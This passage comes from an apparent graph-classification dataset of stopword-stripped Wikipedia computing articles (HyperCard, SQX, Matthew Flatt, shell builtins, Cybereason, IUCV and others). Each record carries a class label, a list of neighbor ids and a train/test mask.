    "text": "HyperCard:hypercard hypercard software application development kit apple macintosh apple iigs computers among first successful hypermedia systems predating world wide web hypercard combines flat-file database graphical flexible user-modifiable interface hypercard includes built-in programming language called hypertalk manipulating data user interface combination features – database simple form layout flexible support graphics ease programming – suits hypercard many different projects rapid application development applications databases interactive applications database requirements command control systems many examples demoscene hypercard originally released 1987 49.95 included free new macs sold withdrawn sale march 2004 received final update 1998 upon return steve jobs apple hypercard runs classic environment ported mac os x. hypercard based concept stack virtual cards cards hold data would rolodex card-filing device card contains set interactive objects including text fields check boxes buttons similar common graphical user interface gui elements users browse stack navigating card card using built-in navigation features powerful search mechanism user-created scripts users build modify stacks adding new cards place gui objects cards using interactive layout engine based simple drag-and-drop interface also hypercard includes prototype template cards called backgrounds new cards created refer one background cards causes objects background copied onto new card way stack cards common layout functionality created layout engine similar concept form used rapid application development rad environments borland delphi microsoft visual basic visual studio database features hypercard system based storage state objects cards physical file representing stack database exist separate system within hypercard stack database engine similar construct exists instead state object system considered live editable time hypercard runtime perspective difference moving text field card typing operations simply change state target object within stack changes immediately saved complete typing field causes text stored stack physical file system operates largely stateless fashion need save operation common many database-oriented systems although somewhat different document-based applications final key element hypercard script single code-carrying element every object within stack script text field whose contents interpreted hypertalk language like property script object edited time changes saved soon complete user invokes actions gui like clicking button typing field actions translated events hypercard runtime runtime examines script object target event like button see script object contains event code called handler hypertalk engine runs handler runtime examines objects visual hierarchy concepts make majority hypercard system stacks backgrounds cards provide form-like gui system stack file provides object persistence database-like functionality hypertalk allows handlers written gui events unlike majority rad database systems era however hypercard combines features user-facing developer-facing single application allows rapid turnaround immediate prototyping possibly without coding allowing users author custom solutions problems personalized interface empowerment became catchword possibility embraced macintosh community phrase programming rest us anyone professional programmers combination features also makes hypercard powerful hypermedia system users build backgrounds suit needs system say rolodex use simple hypertalk commands provide buttons move place place within stack provide navigation system within data elements ui like text fields using features easy build linked systems similar hypertext links web unlike web programming placement browsing tool similar systems created html traditional web services considerably heavyweight hypercard contains object oriented scripting language called hypertalk hypertalk object classes predetermined hypercard environment although others added use externals weakly typed hypertalk supports standard programming structures if-then repeat hypertalk verbose hence ease use readability hypertalk code segments referred scripts term considered less daunting beginning programmers hypercard extended significantly use external command xcmd external function xfcn modules code libraries packaged resource fork integrate either system generally hypertalk language specifically early example plug-in concept unlike conventional plug-ins require separate installation available use included stack directly available scripts stack hypercard peak popularity late 1980s whole ecosystem vendors offered thousands externals hypertalk compilers graphing systems database access internet connectivity animation oracle offered xcmd allows hypercard directly query oracle databases platform superseded oracle card beehive technologies offered hardware interface allows computer control external devices connected via apple desktop bus adb instrument read state connected external switches write digital outputs multitude devices externals allow access macintosh toolbox contains many lower-level commands functions native hypertalk control serial adb ports hypercard created bill atkinson following lsd trip work began march 1985 name wildcard hence creator code wild 1986 dan winkler began work hypertalk name changed hypercard trademark reasons initially released august 1987 understanding atkinson would give hypercard apple company promised release free macs apple timed release coincide macworld conference expo boston massachusetts guarantee maximum publicity hypercard successful almost instantly apple programmer developer association apda said hypercard informational feeding frenzy august 1987 announced october phones never stopped ringing zoo within months release multiple hypercard books 50 disk set public domain stacks apple project managers found hypercard used huge number people internally externally bug reports upgrade suggestions continued flow demonstrating wide variety users since also free difficult justify dedicating engineering resources improvements software apple mainstream developers understood hypercard user empowerment could reduce sales ordinary shrink-wrapped products stewart alsop ii speculated hypercard might replace finder macintosh graphical user interface late 1989 kevin calhoun hypercard engineer apple led effort upgrade program resulted hypercard 2.0 released 1990 new version included on-the-fly compiler greatly increased performance computationally intensive code new debugger many improvements underlying hypertalk language time hypercard 2.0 developed separate group within apple developed 1991 released hypercard iigs version hypercard apple iigs system aimed mainly education market hypercard iigs roughly feature set 1.x versions macintosh hypercard adding support color graphics abilities iigs although stacks hypercard program documents binary-compatible translator program another hypercard stack allows moved one platform apple decided application software packages including hypercard would property wholly owned subsidiary called claris many hypercard developers chose stay apple rather move claris causing development team split claris attempted create business model hypercard could also generate revenues first freely-distributed versions hypercard shipped authoring disabled early versions claris hypercard contain easter egg typing magic message box converts player full hypercard authoring environment trick became nearly universal wrote new version hypercard player apple distributed macintosh operating system claris sold full version commercially many users upset pay use software traditionally supplied free many considered basic part mac even hypercard generating revenue claris little market development continued minor upgrades first failed attempt create third generation hypercard period hypercard began losing market share without several important basic features hypercard authors began moving systems supercard macromedia authorware nonetheless hypercard continued popular used widening range applications game manhole earlier effort creators myst corporate information services apple eventually folded claris back parent company returning hypercard apple core engineering group 1992 apple released eagerly anticipated upgrade hypercard 2.2 included licensed versions color tools addmotion ii adding support color pictures animations however tools limited often cumbersome use hypercard 2.0 lacks true internal color support several attempts made restart hypercard development returned apple product widespread use multimedia-authoring tool rolled quicktime group new effort allow hypercard create quicktime interactive qti movies started direction kevin calhoun qti extended quicktime core multimedia playback features provide true interactive facilities low-level programming language based 68000 assembly language resulting hypercard 3.0 first presented 1996 alpha-quality version shown developers apple annual apple worldwide developers conference wwdc leadership dan crow development continued late 1990s public demos showing many popular features color support internet connectivity ability play hypercard stacks special quicktime movies web browser development upon hypercard 3.0 stalled quicktime team focused away developing quicktime interactive streaming features quicktime 4.0. 1998 steve jobs disliked software atkinson chosen stay apple finish instead joining jobs next according atkinson sculley stink 2000 hypercard engineering team reassigned tasks jobs decided abandon product calhoun crow left apple shortly 2001 final release 1998 totally discontinued march 2004 hypercard runs natively classic mac os still used mac os x classic mode powerpc based machines g5 earlier last functional native hypercard authoring environment classic mode mac os x 10.4 tiger powerpc-based machines hypercard used range hypertext artistic purposes advent powerpoint hypercard often used general-purpose presentation program examples hypercard applications include simple databases choose adventure -type games educational teaching aids due rapid application design facilities hypercard also often used prototyping applications sometimes even version 1.0 implementations inside apple quicktime team one hypercard biggest customers hypercard lower hardware requirements macromedia director several commercial software products created hypercard notably original version interactive game narrative myst voyager company expanded books multimedia cd-roms beethoven ninth symphony cd-rom hard day night beatles voyager macbeth early electronic edition whole earth catalog implemented hypercard stored cd-rom prototype demo popular game n't know jack written hypercard french auto manufacturer renault used control inventory system quebec canada hypercard used control robot arm used insert retrieve video disks national film board cinérobothèque hypercard used prototype fully functional prototype sidoci one first experiments world develop integrated electronic patient record system heavily used montréal consulting firm dmr demonstrate typical day life patient get surgery would look like paperless age activision mainly game company saw hypercard entry point business market changing name mediagenic published several major hypercard-based applications notably danny goodman focal point personal information manager reports hypercard program nine five software allows users treat hypercard full database system robust information viewing printing features hypercard-inspired supercard included roadster plug-in allowed stacks placed inside web pages viewed web browsers appropriate browser plug-in even windows version plug-in allowing computers macintoshes use plug-in first hypercard virus discovered belgium netherlands april 1991 hypercard executed scripts stacks immediately opening also one first applications susceptible macro viruses merryxmas virus discovered early 1993 ken dunham two years concept virus viruses based hypercard overall impact minimal compute apple applications 1987 stated hypercard may make macintosh personal computer choice noting large memory requirement made best suited computers 2 mb memory hard drives magazine predicted smallest programming shop able turn stackware especially using cd-roms compute predicted 1988 future mac software would developed using hypercard using addictive developers wo n't able tear away long enough create anything else byte 1989 listed among excellence winners byte awards stating like first entry flaws magazine wrote hypercard opened new category software praised apple bundling every mac 2001 steve wozniak called hypercard best program ever written hypercard one first products made use popularized hypertext concept large popular base users jakob nielsen pointed hypercard really hypermedia program since links started regions card text objects actual html-style text hyperlinks possible later versions awkward implement seldom used deena larsen programmed links hypercard marble springs bill atkinson later lamented realized power network-oriented stacks instead focusing local stacks single machine hypercard could become first web browser hypercard saw loss popularity growth world wide web since web could handle deliver data much way hypercard without limited files local hard disk hypercard significant impact web inspired creation http influence tim berners-lee colleague robert cailliau javascript whose creator brendan eich inspired hypertalk also key inspiration violawww early web browser pointing-finger cursor used navigating stacks later used first web browsers hyperlink cursor myst computer game franchise initially released hypercard stack included bundled macs example performa 5300 still lives making hypercard facilitating technology starting one best-selling computer games time according ward cunningham inventor wiki wiki concept traced back hypercard stack wrote late 1980s 2017 internet archive established project preserve emulate hypercard stacks allowing users upload gui prototype apple wizzy active lifestyle telephone based hypercard hypercard influenced development web late 1990 influence robert cailliau assisted developing tim berners-lee first web browser javascript inspired hypertalk although hypercard stacks operate internet 1988 least 300 stacks publicly available download commercial compuserve network connected official internet yet system link phone numbers user computer together enable dial numbers without modem using less expensive piece hardware hyperdialer sense like web form association-based experience information browsing via links though operating remotely tcp/ip protocol like web also allows connections many different kinds media companies offered versions four products available offer hypercard-like abilities past products include addition many basic concepts original system later re-used forms apple built system-wide scripting engine applescript language similar hypertalk often used desktop publishing dtp workflow automation needs 1990s facespan provided third-party graphical interface applescript also native graphical programming front-end called automator released mac os x tiger april 2005 one hypercard strengths handling multimedia many multimedia systems like macromedia authorware macromedia director based concepts originating hypercard appware originally named serius developer sometimes seen similar hypercard rapid application development rad systems appware sold early 90s worked mac windows systems",
    "neighbors": [
      6657,
      10755,
      9732,
      1542,
      9736,
      2571,
      1549,
      3598,
      4111,
      7697,
      11289,
      6171,
      9757,
      7713,
      8225,
      10791,
      6186,
      6700,
      1074,
      8754,
      9780,
      4661,
      3639,
      1592,
      9784,
      8253,
      576,
      5696,
      8262,
      8783,
      4180,
      10838,
      1623,
      6231,
      8281,
      3167,
      3681,
      2658,
      9826,
      5733,
      8806,
      3691,
      2676,
      119,
      6264,
      7292,
      637,
      2686,
      6783,
      1664,
      7806,
      10878,
      6791,
      8842,
      5784,
      1177,
      4251,
      3228,
      10910,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      9908,
      4283,
      7869,
      713,
      7885,
      3790,
      2768,
      7378,
      213,
      3286,
      4310,
      9430,
      2777,
      3293,
      4326,
      231,
      6377,
      2282,
      4331,
      1772,
      4844,
      9451,
      10478,
      7928,
      8441,
      8443,
      3324,
      2819,
      7943,
      1290,
      9999,
      784,
      11037,
      10023,
      4910,
      4399,
      6958,
      7983,
      1849,
      2363,
      2365,
      2366,
      3901,
      8510,
      9022,
      1346,
      10562,
      10052,
      838,
      10057,
      9035,
      847,
      2388,
      2901,
      3928,
      6495,
      9063,
      10602,
      3948,
      1389,
      8557,
      11629,
      10608,
      10097,
      4989,
      3971,
      3462,
      4486,
      6023,
      8584,
      6539,
      6028,
      5520,
      1428,
      3483,
      1952,
      6048,
      2979,
      9123,
      11171,
      11173,
      8109,
      8114,
      2492,
      446,
      5054,
      7614,
      2502,
      456,
      1482,
      464,
      6608,
      5078,
      8662,
      9174,
      7133,
      9182,
      9185,
      4068,
      5093,
      9700,
      2023,
      8169,
      494,
      7154,
      5619,
      6133,
      4598,
      11257,
      7163,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4845,
    "label": 6,
    "text": "SQX:sqx sqx-archiver open free data compression archival format used one applications free charge license royalty free homepage provides sdk source compiled dlls likewise unencumbered license costs format designed speedproject squeez also supported tugzip",
    "neighbors": [
      10817,
      11076,
      7718,
      5096,
      1801,
      3114,
      3659,
      10857,
      237,
      4174,
      2095,
      10317,
      4561,
      722,
      10575,
      950,
      4406,
      3804
    ],
    "mask": "Test"
  },
  {
    "node_id": 4846,
    "label": 9,
    "text": "Matthew_Flatt:matthew flatt matthew flatt american computer scientist professor university utah school computing salt lake city also member core development team racket programming language flatt received phd rice university 1999 direction matthias felleisen dissertation mechanics first-class modules mixin classes work triggered research ml community mutually recursive modules object-oriented community mixins traits flatt served one four editors revised^6 report scheme programming language report influenced design racket especially module system exception system record system macro system library links",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      5837,
      11218,
      9299,
      10324,
      10712,
      3034,
      3675,
      219,
      7386,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      1783,
      6906,
      7805
    ],
    "mask": "None"
  },
  {
    "node_id": 4847,
    "label": 7,
    "text": "Semantic_web_data_space:semantic web data space semantic web data space container domain specific portable data provided human and/or machine friendly structures data data space referenced identifier linked data across spaces domains thus viewed object-oriented fashion underlying paradigm brings together ideas technologies various sources approach applied web based systems desktop-based systems data data spaces linked across spaces domains enhance meaning internal data supports work linked data project part semantic web effort benefit useful point querying information across domains assists development web data data space fully supportive data portability advocated dataportability project means object data space movable also ability referenced using identifier uniform resource identifier",
    "neighbors": [
      6629,
      8201,
      3052,
      11674,
      10452,
      2901,
      53,
      119,
      10938,
      4797,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 4848,
    "label": 4,
    "text": "Joint_Cyber-Defence_Command:joint cyber-defence command joint cyber-defence command mccd spanish cyber defence service defence staff responsible planning execution actions related cyber defence networks information telecommunications systems ministry defense others might entrusted well contributing adequate response cyberspace threats aggressions may affect national defense sense mccd directs coordinates matter cyber defense activity centers response incidents security information different branches armed forces exercises timely legitimate proportionate response cyberspace threats aggressions may affect national defense defines directs coordinates awareness training specialized training area addition responsible development detail information security policies information telecommunications systems seginfosit direction execution control compliance policies within scope ministry defense mccd created february 19 2013 defence ministry order 10/2013 joint cyber-defence command created current chief commander mccd divisional general rafael garcía hernández functions joint cyber defence command joint cyber defense command composed following bodies",
    "neighbors": [
      1373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4849,
    "label": 6,
    "text": "Unrar:unrar unrar name two different command-line applications extracting rar file archives source-available freeware windows command-line version unrar created rarlab company created commercial winrar software software extract newer rar v5.0 file archives supported competitors free software linux version unrar based old version rarlab unrar permission author eugene roshal licensed gpl support rar3 format",
    "neighbors": [
      11547,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 4850,
    "label": 2,
    "text": "Shell_builtin:shell builtin computing shell builtin command function called shell executed directly shell instead external executable program shell would load execute shell builtins work significantly faster external programs program loading overhead however code inherently present shell thus modifying updating requires modifications shell therefore shell builtins usually used simple almost trivial functions text output nature operating systems functions systems must necessarily implemented shell builtins notable example codice_1 command changes working directory shell since executable program runs separate process working directories specific process loading codice_1 external program would affect working directory shell loaded widely used shell-builtin codice_3 function terminates session function different names depending shell",
    "neighbors": [
      515,
      9733,
      9735,
      2568,
      521,
      6664,
      6674,
      8729,
      7196,
      2599,
      8236,
      5706,
      3659,
      4174,
      7266,
      1647,
      8306,
      5759,
      5256,
      6281,
      4750,
      2198,
      4248,
      6812,
      7325,
      7847,
      178,
      7356,
      10428,
      2245,
      1741,
      1750,
      10967,
      9946,
      3804,
      10484,
      8954,
      6396,
      3856,
      4369,
      5397,
      808,
      4398,
      7983,
      10033,
      1336,
      4409,
      8504,
      5435,
      5437,
      8517,
      9542,
      4423,
      8522,
      10068,
      4968,
      6506,
      5492,
      3970,
      8582,
      10631,
      11663,
      4001,
      7088,
      960,
      451,
      1987,
      965,
      8675,
      10727,
      6120,
      491,
      2545,
      5106,
      506,
      8692,
      9204,
      11249,
      6138
    ],
    "mask": "Test"
  },
  {
    "node_id": 4851,
    "label": 9,
    "text": "Richard_Wexelblat:richard wexelblat richard l. wexelblat aka dick wexelblat american artisanal woodturner former computer scientist wexelblat received bsee msee cs ph.d. cs moore school electrical engineering university pennsylvania 6/1959 6/1961 12/1965 respectively doctorate believed many reported acm first ever awarded formally recognized computer science department note first cs doctorate first awarded cs department andy van dam share distinction completed cs dissertation essentially time left computer field become artisanal woodturner said originator wexelblat scheduling algorithm choose two good fast cheap stated bob rosin said originated 'm sure also credited first refer occam razor 'the law least astonishment sons alan david brother paul also computer scientists although paul mostly retired david halfway law school",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 4852,
    "label": 7,
    "text": "Pacemaker_(software):pacemaker software pacemaker open-source high availability resource manager software used computer clusters since 2004 2007 part linux-ha project split project implements several apis controlling resources preferred api purpose open cluster framework resource agent api pacemaker generally used corosync cluster engine linux-ha heartbeat",
    "neighbors": [
      7812,
      10917,
      11428,
      5612,
      7983,
      3927,
      11135
    ],
    "mask": "None"
  },
  {
    "node_id": 4853,
    "label": 9,
    "text": "PeachPie:peachpie peachpie open-source php language compiler runtime .net .net core frameworks built top microsoft roslyn compiler platform based first-generation phalanger project peachpie compiles source code written php cil byte-code peachpie takes advantage jit compiler component .net framework order handle beginning compilation process purpose generate optimize native code rather compile php scripts .net assemblies containing cil code meta-data july 2017 project became member .net foundation peachpie architecture similar phalanger project originally started coursework charles university prague czechia implemented microsoft .net compiler platform called roslyn utilizing roslyn api since 2016 czech company iolevel leading development peachpie peachpie several advantages phalanger result roslyn api reworked architecture compiler phalanger able target full .net framework ran windows cross-platform capabilities achieved targeting mono peachpie also allows compilation .net core thus cross-platform default benchmarks published date point performance improvements peachpie compared predecessor project contains advanced semantic analysis allows compiler generate c -like symbols enhanced interoperability features similarities peachpie facebook hhvm compiler executes php specially designed virtual machine however facebook announced late 2017 version 3.24 hhvm would last release compatible php project would focus exclusively supporting facebook proprietary extension php called hack leaves peachpie project kind aspiration compatible past future versions php project receives considerable support microsoft invited present virtual conference .net conf featured microsoft .net well .net rocks podcast since july 2017 peachpie member .net foundation december 2018 iolevel received european innovation council horizon2020 grant pursue work peachpie compiler project lists several main goals 2019 officially tested supported applications include wordpress mediawiki software runs wikipedia page codeigniter addition number php frameworks programs confirmed work workarounds members open source community e.g laravel woocommerce magento",
    "neighbors": [
      10624,
      2948,
      4231,
      1034,
      6154,
      6797,
      9614,
      1935,
      3997,
      4384,
      2465,
      8609,
      11559,
      2603,
      2348,
      9263,
      823,
      190,
      5952,
      6338,
      1347,
      1348,
      2372,
      8644,
      1353,
      6474,
      4171,
      7421,
      9434,
      10587,
      11357,
      2145,
      2401,
      3553,
      7785,
      5612,
      3821,
      2804,
      3573,
      11259,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 4854,
    "label": 2,
    "text": "Jar_Launcher:jar launcher jar launcher program mac os x launches java jar files aqua/java runtime environment jar file double clicked jar launcher also launches class manner jar launcher execute java files rather passes java virtual machine jvm appropriate parameters java programs without gui run command line may properly execute without pseudo terminal jar launcher located codice_1 part apple computer java implementation installed default mac os x 10.11 see link",
    "neighbors": [
      5677,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 4855,
    "label": 7,
    "text": "Tolino:tolino tolino brand name e-readers tablets marketed leading booksellers germany austria switzerland cooperation deutsche telekom since 2014 e-reader also available belgium netherlands italy purchased january 2017 rakuten kobo inc german bookstores hugendubel thalia weltbild founded along deutsche telekom tolino-allianz tolino alliance deutsche telekom functions alliance technology partner responsible entire software hardware element platform well marketing tolino library digital e-books despite alliance book stores remain competition one-another motivation founding tolino alliance provide e-reading solution german e-book readers prevent migration german users international competitors notably amazon kindle however closed nature amazon ecosystem proprietary azw e-book format makes difficult return customers german booktrade first negotiations four german book stores took place spring 2012 summer 2012 tolino alliance formed tolino brand constructed march 2013 introduction brand public tolino first e-book reader tolino shine come november 2013 tolino shine complemented two tablets tolino tab 7 tolino tab 8.9 january 2014 co-founding member group weltbild filed bankruptcy dissolved paragon partners shortly march 2014 deutsche telekom introduced e-book shop pageplace tolino second improved e-reader tolino vision introduced market april 2014 october 2014 frankfurt bookfair bookwholesaler libri announced would become part tolino alliance following 1,000 independent bookstores removed tolino products shelves connected online shops tolino cloud new partner goal become comprehensive alternative digital reading entire german bookmarket likewise autumn 2014 belgium producer standaard boekhandel joined tolino alliance italian bookstore ibs italy became yet another partner ibs offered books ibs.it libraccio.it new improved tolino vision 2 introduced november 2014 featured water-resistant shell tap2flip tolino tab 8 tablet complemented introduction e-reader september 2015 announced bookstores mayersche osiander new partners tolino alliance tolino alliance prominence increased induction netherlandic bookstore libris.nl also blz.nl group frankfurt book festival october 2015 tolino introduced two new e-readers immediately thereafter two made available purchase tolino vision 3 hd became new model tolino-vision line aimed high-end market tolino shine 2 hd lower-end cheaper model serves improved version previous tolino shine november 2015 another italian online shop introduced italian tolino-partners ibs ever since indie-book.it marketed tolino products italy previously announced direct group bertelsmann founding member firm club bertelsmann derclub.de ceased operation end 2015 2015 tolino brand voted readers lesen.net e-reader provider year tolino followed amazon kindle 45 product line 35 previous two years tolino secured first place 34 2013 37 2014 tolino chosen e-reader brand year allese-book.de 2015 tolino received 44.3 votes kobo 27.7 amazon 17.8 previous year survey tolino ranked fourth capturing 17.7 voters",
    "neighbors": [
      9408,
      196,
      6408,
      5869,
      2258,
      8627,
      3828,
      10838,
      8921
    ],
    "mask": "Test"
  },
  {
    "node_id": 4856,
    "label": 3,
    "text": "Pac-Land:pac-land diverging previous pac-man titles pac-land side-scrolling platform game large characters colorful backgrounds closer gameplay style nintendo super mario bros. would released following year includes parallax scrolling pac-land split trips trips objective get fairy kept pac-man hat fairyland also return home pac-man house majority trip involves moving left right avoiding various obstacles enemy ghosts water spurts quicksand traps trip divided number rounds end provides pac-man bonus points depending much time left also position jumping end round player runs time finishing round sue purple ghost speed rapidly final round trip ends pac-man entering fairyland returning fairy hat fairy queen return fairy queen gives pac-man magic boots final round trip pac-man travel right left back home assistance uses magic boots allow jump repeatedly mid-air pac-man completes trip greeted ms. pac-man baby pac-man us release game pac-man cat dog cartoon series sour puss chomp-chomp also welcome pac-man home pac-man begins next trip following objectives although difficulty increases original pac-man fruit appear eat bonus points power pellets turn ghosts blue vulnerable hidden item sometimes accidentally dropped ghosts flagship galaxian rewards 7650 points collected reference namco goroawase number 765 galaxian flagship long running cameo appears bandai namco-made pac-man games also hidden bonuses game eating ghosts certain order give extra time pushing fire hydrant opposite direction give extra lives invincibility balloons collect points warps arcade cabinet version game unique instead joystick six plastic buttons three player although two players would alternate turns two-player game two buttons moved pac-man right left third made jump pictographs cabinet showed images pac-man moving right left jumping turbografx-16 version game made attempt emulate offering type-b control scheme switched pac-man movements buttons controller rather thumb-pad also famicom version uses b run d-pad jump contrast majority famicom games use d-pad run jump b attack japanese release namco pac-man sprite resembles official artwork character longer nose pac-man-shaped eyes game tyrolean hat feather american release pac-land bally midway characters appearances based designs pac-man animated series produced hanna-barbera promote animated series well video game series addition versions feature main background music jingles aforementioned series midway version also features faster game play namco pac-land ported commodore 64 amiga atari lynx atari st turbografx-16 zx spectrum amstrad cpc msx famicom board game handheld lcd game pac-land also produced pac-land republished 1996 part namco museum volume 4 playstation 2012 namco released pac-land namco arcade app iphone ipad pac-land one games included pac-man museum ports home consoles computers released inside outside japan based namco version game namco arcade application version game based midway version non-japanese versions application namco version japanese version pac-land released wii u virtual console game also appears stage super smash bros. wii u super smash bros ultimate rob swan reviewed atari lynx version august 1991 issue cvg magazine gave game score 80 100 robert a. jung also reviewed lynx version giving score 7 10 raze magazine reviewed lynx version also gave score 74",
    "neighbors": [
      8355,
      8484,
      9732,
      8199,
      6539,
      9006,
      10287,
      1776,
      9951,
      10931,
      4311,
      4152,
      9627,
      95,
      3039
    ],
    "mask": "Test"
  },
  {
    "node_id": 4857,
    "label": 2,
    "text": "Lxrun:lxrun unix computing lxrun compatibility layer allow linux binaries run unixware sco openserver solaris without recompilation created mike davidson open source software project since 1997 available mozilla public license sco sun microsystems began officially supporting lxrun 1999 according official lxrun website lxrun maintenance mode meaning longer actively developed reasons cited declining interest lxrun include wide availability real linux machines availability capable emulation systems sco linux kernel personality lkp opensolaris brandz various virtual machine solutions newer linux applications host operating systems officially supported lxrun",
    "neighbors": [
      9665,
      11363,
      8671,
      7983,
      9839,
      5492,
      823,
      2424,
      3487
    ],
    "mask": "Test"
  },
  {
    "node_id": 4858,
    "label": 2,
    "text": "JumpStart_(Solaris):jumpstart solaris jumpstart computer network installation tool set used solaris operating system jumpstart used manage operating system installation many information technology environments corporate otherwise solaris operating system computers widely used provide easier installation minor setup central server one command installation client system start installing also allows completely consistent system installation many systems time install exactly system configuration software tools alternatively different types systems installed different purposes case consistent installations given defined type tools used manipulate jumpstart include jet jumpstart enterprise toolkit created thomas fritz 1994 sun jumpstart consists two main parts network booting system network installation network booting proceeds similarly solaris standard network booting capabilities jumpstart network booting server set local network system installed technically network boot install servers separate functions typically system client system begins jumpstart process accesses operating system component software packages stored jumpstart server usually exclusively using network file system packages optionally additional tools applications automatically installed system rebooted additional configuration may manually performed system configuration may set completely automatically",
    "neighbors": [
      5280,
      6049,
      9665,
      11363,
      5335,
      6445,
      366,
      7983,
      8077,
      11506,
      4309,
      2967,
      5240,
      4858,
      381,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 4859,
    "label": 2,
    "text": "Thompson_shell:thompson shell thompson shell first unix shell introduced first version unix 1971 written ken thompson simple command interpreter designed scripting nonetheless introduced several innovative features command-line interface led development later unix shells name shell command-line interpreter concept making shell user program outside operating system kernel introduced unix precursor multics early feature thompson shell compact syntax input/output redirection multics redirecting input output command required separate commands start stop redirection unix one could simply add argument command line consisting symbol followed filename input symbol output shell would redirect i/o duration command syntax already present release first version unix 1971 later addition concept pipes suggestion douglas mcilroy redirection syntax expanded output one command could passed input another command original pipe syntax described version 3 manual syntax proved ambiguous easily confused redirection files—the system tell command2 command command2 file command2 version 4 syntax changed use symbols denote pipes produces exactly result symbol changed would put output command1 file1 thompson shell syntax redirection piping proven durable adopted unix shells command shells several operating systems notably dos os/2 microsoft windows shell design intentionally minimalistic even goto statements essential control program flow implemented separate commands result 1975 release version 6 unix becoming clear thompson shell inadequate serious programming tasks time developers programmer workbench unix distribution notably john mashey began modifying thompson shell make suitable programming result known pwb shell mashey shell included advanced flow-control mechanisms introduced shell variables remained limited necessity remain compatible thompson shell finally thompson shell replaced main unix shell bourne shell version 7 unix c shell 2bsd released 1979 since virtually modern unix unix-like systems descended v7 2bsd thompson shell generally longer used however available open-source part several ancient unix source distributions ported modern unices historical exhibit",
    "neighbors": [
      6797,
      5397,
      1435,
      3488,
      5156,
      7983,
      11442,
      8499,
      9151,
      10304,
      9027,
      9298,
      2132,
      6369,
      2786,
      8675,
      9444,
      5492,
      6772
    ],
    "mask": "None"
  },
  {
    "node_id": 4860,
    "label": 4,
    "text": "Cybereason:cybereason cybereason cyber security company specializing endpoint detection response software company based boston massachusetts cybereason founded 2012 tel aviv israel former cyber security experts israel defense forces unit 8200 company moved headquarters boston 2014 december 2016 cybereason released free consumer software product prevention ransomware 2014 cybereason raised series funding charles river ventures total cybereason reports raised 88.6m funding rounds receiving 59m series c round softbank 2015 august 2019 cybereason raised 200 million new financing softbank group affiliates cybereason offers endpoint detection response software “ hybrid sensors endpoints communicate ‘ hunting engine ’ cloud",
    "neighbors": [
      9488,
      10539
    ],
    "mask": "Test"
  },
  {
    "node_id": 4861,
    "label": 1,
    "text": "Postgres-XL:postgres-xl postgres-xl distributed relational database management system rdbms software based postgresql aims provide feature parity postgresql distributing workload cluster name postgres-xl stands extensible lattice postgres-xl based postgres-xc earlier distributed postgresql system developed ntt data enterprisedb 2012 cloud database startup stormdb adopted postgres-xc developed proprietary extensions improvements 2013 stormdb acquired translattice improved software open-sourced name postgres-xl 2014 since 2015 postgres-xl development also supported 2ndquadrant postgres-xl provides cluster-wide consistent transaction snapshots via central global transaction manager gtm node requires fast interconnect nodes postgres-xl suited geographically distributed clusters larger queries split parallelized multiple nodes individual database tables chosen fully replicated across cluster usually smaller tables sharded separate nodes write scalability",
    "neighbors": [
      3784,
      9386,
      10737,
      2901,
      1142,
      1049,
      8539,
      10201
    ],
    "mask": "Test"
  },
  {
    "node_id": 4862,
    "label": 2,
    "text": "IUCV:iucv iucv inter user communication vehicle data transfer mechanism ibm vm line operating systems introduced vm/sp release 1 1980 allows establishment point point communication channels either two virtual machines virtual machine hypervisor services effect iucv provides form message-based interaction virtual machines anticipated client/server interaction network connected physical machines emerged later distributed systems iucv implemented cp vm hypervisor controls aspects session establishments message passing flow control virtual machine use iucv service must first indicate address area within address space cp able store information regarding pending information status therefore codice_1 method must invoked first iucv terminology session two end points called path identified end path id relevant virtual machine owns session end path always connected channel meaning connectionless paths establish path initiating virtual machine must invoke codice_2 method specify path target identity either another virtual machine name name cp system service start '* character valid character within virtual machine name provided target initialized iucv target notified pending incoming path connection may either use codice_3 method complete path establishment codice_4 method effectively closes pending path path established messages may passed two path endpoints iucv messages bounded beginning end one message pending path endpoint iucv merge messages messages sent path using codice_5 method end point receive message using codice_6 method original message also requested reply receiving end point use codice_7 method send reply multiple messages may made pending path number messages allowed pending path specified path establishment exceed 65535 attempting send message path reached pending message limit result error data transfer may temporarily suspended using codice_8 method path suspended message transfers allowed path codice_9 method invoked virtual machine initially suspended path virtual machine may poll iucv notifications using codice_10 codice_11 methods nothing pending virtual machine waits information available either end point issues codice_4 method path enters severed closing state end point notified point new messages allowed path end point may still retrieve pending messages end point also issues codice_4 method path effectively dismantled path may implicitly closed either cases end path behavior identical explicit path termination iucv methods invoked using 'b2f0 x instruction instruction must invoked virtual supervisor state example guest supervisor operation exception program interrupt generated instruction interpreted cp iucv request iparml iucv parameter list control block describes method invoked well method parameters upon completion b2f0 instruction fields altered cp indicate status b2f0 instruction completion cp notifies virtual machine pending message status information making external interrupt code x'4000 pending virtual machine interrupt occurs information regarding pending status made available address location specified codice_1 method cp specific macro iucv generates appropriate code including instruction filling iparml details regarding parameters method defaulted checked conflict cms made handle iucv application requests cms set iucv macros cmsiucv allow multiple applications share iucv facility within virtual machine access iucv functions controlled statements cp directory list virtual machines specifications virtual machine permitted accept communications virtual machines via codice_16 directory statement establish communication path virtual machine via codice_17 statement also possible allow virtual machine issue path connection requests specific virtual machines specifying virtual machine name iucv statement example codice_18 default user always allowed connect iucv statement controls cp-imposed access control iucv connections addition virtual machine impose access control rejecting attempt connect cp system services iucv end points virtual machines allow virtual machine perform hypervisor functions asynchronously access specific hypervisor facilities examples gcs group control system vm uses iucv perform maintenance shared memory areas virtual machines using implicit path termination gcs recovery virtual machine ensure locks held shared area 